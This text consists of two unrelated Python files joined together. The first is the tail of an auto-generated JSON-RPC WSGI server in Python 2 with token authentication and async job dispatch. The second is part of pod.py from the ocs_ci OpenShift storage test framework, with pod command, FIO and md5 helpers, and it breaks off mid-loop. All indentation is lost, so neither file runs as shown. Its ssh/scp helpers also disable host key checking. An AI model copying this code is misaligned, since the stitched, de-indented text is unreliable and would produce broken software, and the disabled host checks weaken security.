config={'server': 'nexus.api.globusonline.org',
'verify_ssl': True,
'client': None,
'client_secret': None})
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {'call_stack': [{'time':self.now_in_utc(), 'method': req['method']}]}
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
if method_name in async_run_methods:
method_name = async_run_methods[method_name][0] + "." + async_run_methods[method_name][1]
if method_name in async_check_methods:
method_name = async_check_methods[method_name][0] + "." + async_check_methods[method_name][1]
auth_req = self.method_authentication.get(method_name,
"none")
if auth_req != "none":
if token is None and auth_req == 'required':
err = ServerError()
err.data = "Authentication required for " + \
"ContigFilteringPSD but no authentication header was passed"
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user, _, _ = \
self.auth_client.validate_token(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = ServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
method_name = req['method']
if method_name in async_run_methods or method_name in async_check_methods:
if method_name in async_run_methods:
orig_method_pair = async_run_methods[method_name]
else:
orig_method_pair = async_check_methods[method_name]
orig_method_name = orig_method_pair[0] + '.' + orig_method_pair[1]
if 'required' != self.method_authentication.get(orig_method_name, 'none'):
err = ServerError()
err.data = 'Async method ' + orig_method_name + ' should require ' + \
'authentication, but it has authentication level: ' + \
self.method_authentication.get(orig_method_name, 'none')
raise err
job_service_client = AsyncJobServiceClient(token = ctx['token'])
if method_name in async_run_methods:
run_job_params = {
'method': orig_method_name,
'params': req['params']}
if 'rpc_context' in ctx:
run_job_params['rpc_context'] = ctx['rpc_context']
job_id = job_service_client.run_job(run_job_params)
respond = {'version': '1.1', 'result': [job_id], 'id': req['id']}
rpc_result = json.dumps(respond, cls=JSONObjectEncoder)
status = '200 OK'
else:
job_id = req['params'][0]
job_state = job_service_client.check_job(job_id)
finished = job_state['finished']
if finished != 0 and 'error' in job_state and job_state['error'] is not None:
err = {'error': job_state['error']}
rpc_result = self.process_error(err, ctx, req, None)
else:
respond = {'version': '1.1', 'result': [job_state], 'id': req['id']}
rpc_result = json.dumps(respond, cls=JSONObjectEncoder)
status = '200 OK'
elif method_name in sync_methods or (method_name + '_async') not in async_run_methods:
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
else:
err = ServerError()
err.data = 'Method ' + method_name + ' cannot be run synchronously'
raise err
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception, e:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'The request method was %s\n' % environ['REQUEST_METHOD']
# print 'The environment dictionary is:\n%s\n' % pprint.pformat(environ) @IgnorePep8
# print 'The request body was: %s' % request_body
# print 'The result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
if 'error' not in error['error'] or error['error']['error'] is None:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh,mm = divmod((delta.days * 24*60*60 + delta.seconds + 30) // 60, 60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
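# Example: on a host running two hours ahead of UTC, delta is about two hours,
# so this returns the local ISO timestamp with "+2:00" appended (note that
# "%+02d" does not zero-pad the offset hour to "+02").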
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {
'': application
}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow the port number to be returned.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user, _, _ = application.auth_client.validate_token(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception, e:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if len(sys.argv) >= 3 and len(sys.argv) <= 4 and os.path.isfile(sys.argv[1]):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
pod.py
|
"""
Pod related functionalities and context info
Each pod in the openshift cluster will have a corresponding pod object
"""
import logging
import os
import re
import yaml
import tempfile
import time
import calendar
from threading import Thread
import base64
from semantic_version import Version
from ocs_ci.ocs.bucket_utils import craft_s3_command
from ocs_ci.ocs.ocp import OCP, verify_images_upgraded
from ocs_ci.helpers import helpers
from ocs_ci.helpers.proxy import update_container_with_proxy_env
from ocs_ci.ocs import constants, defaults, node, workload, ocp
from ocs_ci.framework import config
from ocs_ci.ocs.exceptions import (
CommandFailed,
NonUpgradedImagesFoundError,
ResourceWrongStatusException,
TimeoutExpiredError,
UnavailableResourceException,
ResourceNotFoundError,
)
from ocs_ci.ocs.utils import setup_ceph_toolbox, get_pod_name_by_pattern
from ocs_ci.ocs.resources.ocs import OCS, get_job_obj
from ocs_ci.utility import templating
from ocs_ci.utility.utils import (
run_cmd,
check_timeout_reached,
TimeoutSampler,
get_ocp_version,
)
from ocs_ci.utility.utils import check_if_executable_in_path
from ocs_ci.utility.retry import retry
logger = logging.getLogger(__name__)
FIO_TIMEOUT = 600
TEXT_CONTENT = (
"Lorem ipsum dolor sit amet, consectetur adipiscing elit, "
"sed do eiusmod tempor incididunt ut labore et dolore magna "
"aliqua. Ut enim ad minim veniam, quis nostrud exercitation "
"ullamco laboris nisi ut aliquip ex ea commodo consequat. "
"Duis aute irure dolor in reprehenderit in voluptate velit "
"esse cillum dolore eu fugiat nulla pariatur. Excepteur sint "
"occaecat cupidatat non proident, sunt in culpa qui officia "
"deserunt mollit anim id est laborum."
)
TEST_FILE = "/var/lib/www/html/test"
FEDORA_TEST_FILE = "/mnt/test"
class Pod(OCS):
"""
Handles per pod related context
"""
def __init__(self, **kwargs):
"""
Initializer function
kwargs:
Copy of ocs/defaults.py::<some pod> dictionary
"""
self.pod_data = kwargs
# configure http[s]_proxy env variable, if applicable
update_container_with_proxy_env(self.pod_data)
super(Pod, self).__init__(**kwargs)
with tempfile.NamedTemporaryFile(
mode="w+", prefix="POD_", delete=False
) as temp_info:
self.temp_yaml = temp_info.name
self._name = self.pod_data.get("metadata").get("name")
self._labels = self.get_labels()
self._roles = []
self.ocp = OCP(
api_version=defaults.API_VERSION,
kind=constants.POD,
namespace=self.namespace,
)
self.fio_thread = None
# TODO: get backend config !!
self.wl_obj = None
self.wl_setup_done = False
@property
def name(self):
return self._name
@property
def namespace(self):
return self._namespace
@property
def roles(self):
return self._roles
@property
def labels(self):
return self._labels
@property
def restart_count(self):
return self.get().get("status").get("containerStatuses")[0].get("restartCount")
def __setattr__(self, key, val):
self.__dict__[key] = val
def add_role(self, role):
"""
Adds a new role for this pod
Args:
role (str): New role to be assigned for this pod
"""
self._roles.append(role)
def get_fio_results(self, timeout=FIO_TIMEOUT):
"""
Get FIO execution results
Returns:
dict: Dictionary represents the FIO execution results
Raises:
Exception: In case of exception from FIO
"""
logger.info(f"Waiting for FIO results from pod {self.name}")
try:
result = self.fio_thread.result(timeout)
if result:
return yaml.safe_load(result)
raise CommandFailed(f"FIO execution results: {result}.")
except CommandFailed as ex:
logger.exception(f"FIO failed: {ex}")
raise
except Exception as ex:
logger.exception(f"Found Exception: {ex}")
raise
def exec_cmd_on_pod(
self, command, out_yaml_format=True, secrets=None, timeout=600, **kwargs
):
"""
Execute a command on a pod (e.g. oc rsh)
Args:
command (str): The command to execute on the given pod
out_yaml_format (bool): whether to return yaml loaded python
object OR to return raw output
secrets (list): A list of secrets to be masked with asterisks
This kwarg is popped in order to not interfere with
subprocess.run(``**kwargs``)
timeout (int): timeout for the exec_oc_cmd, defaults to 600 seconds
Returns:
Munch Obj: This object represents a returned yaml file
"""
rsh_cmd = f"rsh {self.name} "
rsh_cmd += command
return self.ocp.exec_oc_cmd(
rsh_cmd, out_yaml_format, secrets=secrets, timeout=timeout, **kwargs
)
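# A minimal usage sketch for exec_cmd_on_pod (assumes `pod_obj` is a running Pod):
#   pod_obj.exec_cmd_on_pod("df -h", out_yaml_format=False)
#   pod_obj.exec_cmd_on_pod("ls -l /var/lib/www/html", out_yaml_format=False)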
def exec_s3_cmd_on_pod(self, command, mcg_obj=None):
"""
Execute an S3 command on a pod
Args:
mcg_obj (MCG): An MCG object containing the MCG S3 connection credentials
command (str): The command to execute on the given pod
Returns:
Munch Obj: This object represents a returned yaml file
"""
return self.exec_cmd_on_pod(
craft_s3_command(command, mcg_obj),
out_yaml_format=False,
secrets=[mcg_obj.access_key_id, mcg_obj.access_key, mcg_obj.s3_endpoint]
if mcg_obj
else None,
)
def exec_sh_cmd_on_pod(self, command, sh="bash"):
"""
Execute a pure bash command on a pod via oc exec where you can use
bash syntax like &&, ||, ;, for loops and so on.
Args:
command (str): The command to execute on the given pod
Returns:
str: stdout of the command
"""
cmd = f'exec {self.name} -- {sh} -c "{command}"'
return self.ocp.exec_oc_cmd(cmd, out_yaml_format=False)
def get_labels(self):
"""
Get labels from pod
Raises:
NotFoundError: If resource not found
Returns:
dict: All the openshift labels on a given pod
"""
return self.pod_data.get("metadata").get("labels")
def exec_ceph_cmd(self, ceph_cmd, format="json-pretty"):
"""
Execute a Ceph command on the Ceph tools pod
Args:
ceph_cmd (str): The Ceph command to execute on the Ceph tools pod
format (str): The returning output format of the Ceph command
Returns:
dict: Ceph command output
Raises:
CommandFailed: In case the pod is not a toolbox pod
"""
if "rook-ceph-tools" not in self.labels.values():
raise CommandFailed("Ceph commands can be executed only on toolbox pod")
ceph_cmd = ceph_cmd
if format:
ceph_cmd += f" --format {format}"
out = self.exec_cmd_on_pod(ceph_cmd)
# For some commands, like "ceph fs ls", the returned output is a list
if isinstance(out, list):
return [item for item in out if item]
return out
def get_storage_path(self, storage_type="fs"):
"""
Get the pod volume mount path or device path
Returns:
str: The mount path of the volume on the pod (e.g. /var/lib/www/html/) if storage_type is fs
else device path of raw block pv
"""
# TODO: Allow returning a path of a specified volume of a specified
# container
if storage_type == "block":
return (
self.pod_data.get("spec")
.get("containers")[0]
.get("volumeDevices")[0]
.get("devicePath")
)
return (
self.pod_data.get("spec")
.get("containers")[0]
.get("volumeMounts")[0]
.get("mountPath")
)
def workload_setup(self, storage_type, jobs=1):
"""
Do setup on pod for running FIO
Args:
storage_type (str): 'fs' or 'block'
jobs (int): Number of jobs to execute FIO
"""
work_load = "fio"
name = f"test_workload_{work_load}"
path = self.get_storage_path(storage_type)
# few io parameters for Fio
self.wl_obj = workload.WorkLoad(name, path, work_load, storage_type, self, jobs)
assert self.wl_obj.setup(), f"Setup for FIO failed on pod {self.name}"
self.wl_setup_done = True
def run_io(
self,
storage_type,
size,
io_direction="rw",
rw_ratio=75,
jobs=1,
runtime=60,
depth=4,
rate="1m",
rate_process="poisson",
fio_filename=None,
bs="4K",
end_fsync=0,
):
"""
Execute FIO on a pod
This operation will run in background and will store the results in
'self.fio_thread.result()'.
In order to wait for the output and not continue with the test until
FIO is done, call self.fio_thread.result() right after calling run_io.
See tests/manage/test_pvc_deletion_during_io.py::test_run_io
for usage of FIO
Args:
storage_type (str): 'fs' or 'block'
size (str): Size in MB, e.g. '200M'
io_direction (str): Determines the operation:
'ro', 'wo', 'rw' (default: 'rw')
rw_ratio (int): Determines the reads and writes using a
<rw_ratio>%/100-<rw_ratio>%
(e.g. the default is 75, which means a 75%/25% split, i.e. 3 reads
are performed for every write)
jobs (int): Number of jobs to execute FIO
runtime (int): Number of seconds IO should run for
depth (int): IO depth
rate (str): rate of IO default 1m, e.g. 16k
rate_process (str): kind of rate process default poisson, e.g. poisson
fio_filename(str): Name of fio file created on app pod's mount point
bs (str): Block size, e.g. 4K
end_fsync (int): If 1, fio will sync file contents when a write
stage has completed. Fio default is 0
"""
if not self.wl_setup_done:
self.workload_setup(storage_type=storage_type, jobs=jobs)
if io_direction == "rw":
self.io_params = templating.load_yaml(constants.FIO_IO_RW_PARAMS_YAML)
self.io_params["rwmixread"] = rw_ratio
else:
self.io_params = templating.load_yaml(constants.FIO_IO_PARAMS_YAML)
self.io_params["runtime"] = runtime
size = size if isinstance(size, str) else f"{size}G"
self.io_params["size"] = size
if fio_filename:
self.io_params["filename"] = fio_filename
self.io_params["iodepth"] = depth
self.io_params["rate"] = rate
self.io_params["rate_process"] = rate_process
self.io_params["bs"] = bs
if end_fsync:
self.io_params["end_fsync"] = end_fsync
self.fio_thread = self.wl_obj.run(**self.io_params)
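# A minimal usage sketch (assumes `pod_obj` is an existing Pod with a mounted volume):
#   pod_obj.run_io(storage_type="fs", size="1G", runtime=120, fio_filename="fio-test")
#   results = pod_obj.get_fio_results()  # blocks until FIO finishes or times out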
def fillup_fs(self, size, fio_filename=None):
"""
Execute FIO on a pod to fill up a file
This will run sequential IO with a 1MB block size to fill up the file with data
This operation will run in background and will store the results in
'self.fio_thread.result()'.
In order to wait for the output and not continue with the test until
FIO is done, call self.fio_thread.result() right after calling run_io.
See tests/manage/test_pvc_deletion_during_io.py::test_run_io
for usage of FIO
Args:
size (str): Size in MB, e.g. '200M'
fio_filename(str): Name of fio file created on app pod's mount point
"""
if not self.wl_setup_done:
self.workload_setup(storage_type="fs", jobs=1)
self.io_params = templating.load_yaml(constants.FIO_IO_FILLUP_PARAMS_YAML)
size = size if isinstance(size, str) else f"{size}M"
self.io_params["size"] = size
if fio_filename:
self.io_params["filename"] = fio_filename
self.fio_thread = self.wl_obj.run(**self.io_params)
def run_git_clone(self, skip_install=True):
"""
Execute git clone on a pod to simulate a Jenkins user
Args:
skip_install (bool): By default True, skips git package
installation in pod
"""
name = "test_workload"
work_load = "jenkins"
wl = workload.WorkLoad(
name=name, work_load=work_load, pod=self, path=self.get_storage_path()
)
if not skip_install:
assert wl.setup(), "Setup for git failed"
wl.run()
def install_packages(self, packages):
"""
Install packages in a Pod
Args:
packages (list): List of packages to install
"""
if isinstance(packages, list):
packages = " ".join(packages)
cmd = f"yum install {packages} -y"
self.exec_cmd_on_pod(cmd, out_yaml_format=False)
def copy_to_server(self, server, authkey, localpath, remotepath, user=None):
"""
Upload a file from pod to server
Args:
server (str): Name of the server to upload
authkey (str): Authentication file (.pem file)
localpath (str): Local file/dir in pod to upload
remotepath (str): Target path on the remote server
user (str): User name to connect to server
"""
if not user:
user = "root"
cmd = (
f'scp -i {authkey} -o "StrictHostKeyChecking no"'
f" -r {localpath} {user}@{server}:{remotepath}"
)
self.exec_cmd_on_pod(cmd, out_yaml_format=False)
def exec_cmd_on_node(self, server, authkey, cmd, user=None):
"""
Run command on a remote server from pod
Args:
server (str): Name of the server to run the command
authkey (str): Authentication file (.pem file)
cmd (str): command to run on server from pod
user (str): User name to connect to server
"""
if not user:
user = "root"
cmd = f'ssh -i {authkey} -o "StrictHostKeyChecking no" {user}@{server} {cmd}'
self.exec_cmd_on_pod(cmd, out_yaml_format=False)
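# A hedged usage sketch for the two remote helpers above. The server name,
# key path and file paths are hypothetical placeholders, not values defined
# in this module:
#
#     pod_obj.copy_to_server(
#         server="bastion.example.com",
#         authkey="/tmp/key.pem",
#         localpath="/mnt/result.log",
#         remotepath="/tmp/result.log",
#     )
#     pod_obj.exec_cmd_on_node(
#         server="bastion.example.com", authkey="/tmp/key.pem", cmd="uptime"
#     )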
def get_memory(self, container_name):
"""
Get the pod memory size
Args:
container_name (str): The name of the container to look for
Returns:
str: The container memory size (e.g. '5Gi')
"""
pod_containers = self.pod_data.get("spec").get("containers")
matched_containers = [
c for c in pod_containers if c.get("name") == container_name
]
if len(matched_containers) > 1:
logger.error(
f"Multiple containers, of the same name, were found: {[c.get('name') for c in matched_containers]}"
)
container = matched_containers[0]
return container.get("resources").get("limits").get("memory")
def get_node(self):
"""
Gets the node name
Returns:
str: Node name
"""
if config.ENV_DATA.get(
"platform", ""
).lower() == "aws" and config.DEPLOYMENT.get("local_storage"):
return self.pod_data["spec"]["nodeSelector"]["kubernetes.io/hostname"]
else:
return self.pod_data["spec"]["nodeName"]
# Helper functions for Pods
def get_all_pods(
namespace=None,
selector=None,
selector_label="app",
exclude_selector=False,
wait=False,
):
"""
Get all pods in a namespace.
Args:
namespace (str): Name of the namespace
If namespace is None - get all pods
selector (list): List of the resource selectors to search with.
Example: ['alertmanager','prometheus']
selector_label (str): Label of selector (default: app).
exclude_selector (bool): If True, exclude pods matching the selector instead of selecting them
wait (bool): If True, wait for the pods to stabilize before collecting them
Returns:
list: List of Pod objects
"""
ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
# In case of node failures (with >4 worker nodes), pods automatically
# fail over to other nodes.
# So, we are waiting for the pods to come up on the new node
if wait:
wait_time = 180
logger.info(f"Waiting for {wait_time}s for the pods to stabilize")
time.sleep(wait_time)
pods = ocp_pod_obj.get()["items"]
if selector:
if exclude_selector:
pods_new = [
pod
for pod in pods
if pod["metadata"].get("labels", {}).get(selector_label) not in selector
]
else:
pods_new = [
pod
for pod in pods
if pod["metadata"].get("labels", {}).get(selector_label) in selector
]
pods = pods_new
pod_objs = [Pod(**pod) for pod in pods]
return pod_objs
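# A hedged usage sketch for get_all_pods; the label values are illustrative
# assumptions, not constants defined here:
#
#     # all pods labeled app=rook-ceph-osd or app=rook-ceph-mon
#     pods = get_all_pods(
#         namespace=config.ENV_DATA["cluster_namespace"],
#         selector=["rook-ceph-osd", "rook-ceph-mon"],
#         selector_label="app",
#     )
#     # everything except the tools pod
#     non_tool_pods = get_all_pods(
#         namespace=config.ENV_DATA["cluster_namespace"],
#         selector=["rook-ceph-tools"],
#         exclude_selector=True,
#     )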
def get_ceph_tools_pod():
"""
Get the Ceph tools pod
Returns:
Pod object: The Ceph tools pod object
"""
ocp_pod_obj = OCP(
kind=constants.POD, namespace=config.ENV_DATA["cluster_namespace"]
)
ct_pod_items = ocp_pod_obj.get(selector="app=rook-ceph-tools")["items"]
if not ct_pod_items:
# setup ceph_toolbox pod if the cluster has been setup by some other CI
setup_ceph_toolbox()
ct_pod_items = ocp_pod_obj.get(selector="app=rook-ceph-tools")["items"]
assert ct_pod_items, "No Ceph tools pod found"
# In the case of node failure, the CT pod will be recreated with the old
# one in status Terminated. Therefore, need to filter out the Terminated pod
running_ct_pods = list()
for pod in ct_pod_items:
if (
ocp_pod_obj.get_resource_status(pod.get("metadata").get("name"))
== constants.STATUS_RUNNING
):
running_ct_pods.append(pod)
assert running_ct_pods, "No running Ceph tools pod found"
ceph_pod = Pod(**running_ct_pods[0])
return ceph_pod
def get_csi_provisioner_pod(interface):
"""
Get the provisioner pods based on interface
Args:
interface (str): The interface type, e.g. constants.CEPHBLOCKPOOL or constants.CEPHFILESYSTEM
Returns:
tuple: Names of the two provisioner pods for the given interface
"""
ocp_pod_obj = OCP(
kind=constants.POD, namespace=config.ENV_DATA["cluster_namespace"]
)
selector = (
"app=csi-rbdplugin-provisioner"
if (
interface == constants.CEPHBLOCKPOOL
or interface == constants.CEPHBLOCKPOOL_THICK
)
else "app=csi-cephfsplugin-provisioner"
)
provision_pod_items = ocp_pod_obj.get(selector=selector)["items"]
assert provision_pod_items, f"No {interface} provisioner pod found"
provisioner_pod = (
Pod(**provision_pod_items[0]).name,
Pod(**provision_pod_items[1]).name,
)
return provisioner_pod
def get_csi_snapshoter_pod():
"""
Get the csi snapshot controller pod
Returns:
str: Name of the csi snapshot controller pod
"""
ocp_pod_obj = OCP(
kind=constants.POD, namespace="openshift-cluster-storage-operator"
)
selector = "app=csi-snapshot-controller"
snapshotner_pod = ocp_pod_obj.get(selector=selector)["items"]
snapshotner_pod = Pod(**snapshotner_pod[0]).name
return snapshotner_pod
def get_rgw_pods(rgw_label=constants.RGW_APP_LABEL, namespace=None):
"""
Fetches info about rgw pods in the cluster
Args:
rgw_label (str): label associated with rgw pods
(default: defaults.RGW_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: none)
Returns:
list: Pod objects of rgw pods
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
rgws = get_pods_having_label(rgw_label, namespace)
return [Pod(**rgw) for rgw in rgws]
def get_ocs_operator_pod(ocs_label=constants.OCS_OPERATOR_LABEL, namespace=None):
"""
Fetches info about the ocs-operator pod in the cluster
Args:
ocs_label (str): label associated with ocs_operator pod
(default: defaults.OCS_OPERATOR_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: none)
Returns:
Pod object: ocs_operator pod object
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
ocs_operator = get_pods_having_label(ocs_label, namespace)
ocs_operator_pod = Pod(**ocs_operator[0])
return ocs_operator_pod
def list_ceph_images(pool_name="rbd"):
"""
Args:
pool_name (str): Name of the pool to get the ceph images
Returns:
list: List of RBD images in the pool
"""
ct_pod = get_ceph_tools_pod()
return ct_pod.exec_ceph_cmd(ceph_cmd=f"rbd ls {pool_name}", format="json")
@retry(TypeError, tries=5, delay=2, backoff=1)
def check_file_existence(pod_obj, file_path):
"""
Check if file exists inside the pod
Args:
pod_obj (Pod): The object of the pod
file_path (str): The full path of the file to look for inside
the pod
Returns:
bool: True if the file exists, False otherwise
"""
try:
check_if_executable_in_path(pod_obj.exec_cmd_on_pod("which find"))
except CommandFailed:
pod_obj.install_packages("findutils")
ret = pod_obj.exec_cmd_on_pod(f'bash -c "find {file_path}"')
if re.search(file_path, ret):
return True
return False
def get_file_path(pod_obj, file_name):
"""
Get the full path of the file
Args:
pod_obj (Pod): The object of the pod
file_name (str): The name of the file for which path to get
Returns:
str: The full path of the file
"""
path = (
pod_obj.get()
.get("spec")
.get("containers")[0]
.get("volumeMounts")[0]
.get("mountPath")
)
file_path = os.path.join(path, file_name)
return file_path
def cal_md5sum(pod_obj, file_name, block=False):
"""
Calculates the md5sum of the file
Args:
pod_obj (Pod): The object of the pod
file_name (str): The name of the file for which md5sum to be calculated
block (bool): True if the volume mode of PVC used on pod is 'Block'.
file_name will be the devicePath in this case.
Returns:
str: The md5sum of the file
"""
file_path = file_name if block else get_file_path(pod_obj, file_name)
md5sum_cmd_out = pod_obj.exec_cmd_on_pod(
command=f'bash -c "md5sum {file_path}"', out_yaml_format=False
)
md5sum = md5sum_cmd_out.split()[0]
logger.info(f"md5sum of file {file_name}: {md5sum}")
return md5sum
def verify_data_integrity(pod_obj, file_name, original_md5sum, block=False):
"""
Verifies existence and md5sum of file created from first pod
Args:
pod_obj (Pod): The object of the pod
file_name (str): The name of the file for which md5sum to be calculated
original_md5sum (str): The original md5sum of the file
block (bool): True if the volume mode of PVC used on pod is 'Block'.
file_name will be the devicePath in this case.
Returns:
bool: True if the file exists and md5sum matches
Raises:
AssertionError: If file doesn't exist or md5sum mismatch
"""
file_path = file_name if block else get_file_path(pod_obj, file_name)
assert check_file_existence(pod_obj, file_path), f"File {file_name} doesn't exist"
current_md5sum = cal_md5sum(pod_obj, file_name, block)
logger.info(f"Original md5sum of file: {original_md5sum}")
logger.info(f"Current md5sum of file: {current_md5sum}")
assert current_md5sum == original_md5sum, "Data corruption found"
logger.info(f"File {file_name} exists and md5sum matches")
return True
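# A hedged end-to-end sketch of the data-integrity helpers above. The pod
# objects and file name are illustrative assumptions:
#
#     pod_a.run_io(storage_type="fs", size="1G", fio_filename="integrity_file")
#     pod_a.get_fio_results()
#     original_md5 = cal_md5sum(pod_a, "integrity_file")
#     # after remounting the same PVC on another pod:
#     verify_data_integrity(pod_b, "integrity_file", original_md5)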
def get_fio_rw_iops(pod_obj):
"""
Execute FIO on a pod
Args:
pod_obj (Pod): The object of the pod
"""
fio_result = pod_obj.get_fio_results()
logging.info(f"FIO output: {fio_result}")
logging.info("IOPs after FIO:")
logging.info(f"Read: {fio_result.get('jobs')[0].get('read').get('iops')}")
logging.info(f"Write: {fio_result.get('jobs')[0].get('write').get('iops')}")
def run_io_in_bg(pod_obj, expect_to_fail=False, fedora_dc=False):
"""
Run I/O in the background
Args:
pod_obj (Pod): The object of the pod
expect_to_fail (bool): True for the command to be expected to fail
(disruptive operations), False otherwise
fedora_dc (bool): set to False by default. If set to True, it runs IO in
background on a fedora dc pod.
Returns:
Thread: A thread of the I/O execution
"""
logger.info(f"Running I/O on pod {pod_obj.name}")
def exec_run_io_cmd(pod_obj, expect_to_fail, fedora_dc):
"""
Execute I/O
"""
try:
# Writing content to a new file every 0.01 seconds.
# Without sleep, the device will run out of space very quickly -
# 5-10 seconds for a 5GB device
if fedora_dc:
FILE = FEDORA_TEST_FILE
else:
FILE = TEST_FILE
pod_obj.exec_cmd_on_pod(
command=f'bash -c "let i=0; while true; do echo '
f'{TEXT_CONTENT} >> {FILE}$i; let i++; sleep 0.01; done"',
timeout=2400,
)
# Once the pod gets deleted, the I/O execution will get terminated.
# Hence, catching this exception
except CommandFailed as ex:
if expect_to_fail:
if re.search("code 137", str(ex)) or (re.search("code 143", str(ex))):
logger.info("I/O command got terminated as expected")
return
raise ex
thread = Thread(target=exec_run_io_cmd, args=(pod_obj, expect_to_fail, fedora_dc))
thread.start()
time.sleep(2)
# Checking file existence
if fedora_dc:
FILE = FEDORA_TEST_FILE
else:
FILE = TEST_FILE
test_file = FILE + "1"
# Check I/O started
try:
for sample in TimeoutSampler(
timeout=20,
sleep=1,
func=check_file_existence,
pod_obj=pod_obj,
file_path=test_file,
):
